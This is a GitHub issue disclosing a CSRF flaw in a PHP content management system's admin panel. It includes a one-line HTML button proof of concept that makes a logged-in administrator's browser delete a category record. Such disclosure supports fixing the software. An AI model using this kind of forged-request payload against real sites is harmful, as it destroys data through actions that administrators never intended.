Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF vulnerable #4

Open
albert5888 opened this issue Aug 11, 2022 · 0 comments
Open

CSRF vulnerable #4

albert5888 opened this issue Aug 11, 2022 · 0 comments

Comments

@albert5888
Copy link

Vulnerability details:
When the administrator logs in, click the button will delete the specified column.

Vulnerability POC:
<input type ="button" onclick="javascript:location.href='http://127.0.0.1/index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17'" value="Click Me!!!"></input>

CSRF HTML:
image
and click the button
image
Successfully deleted
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant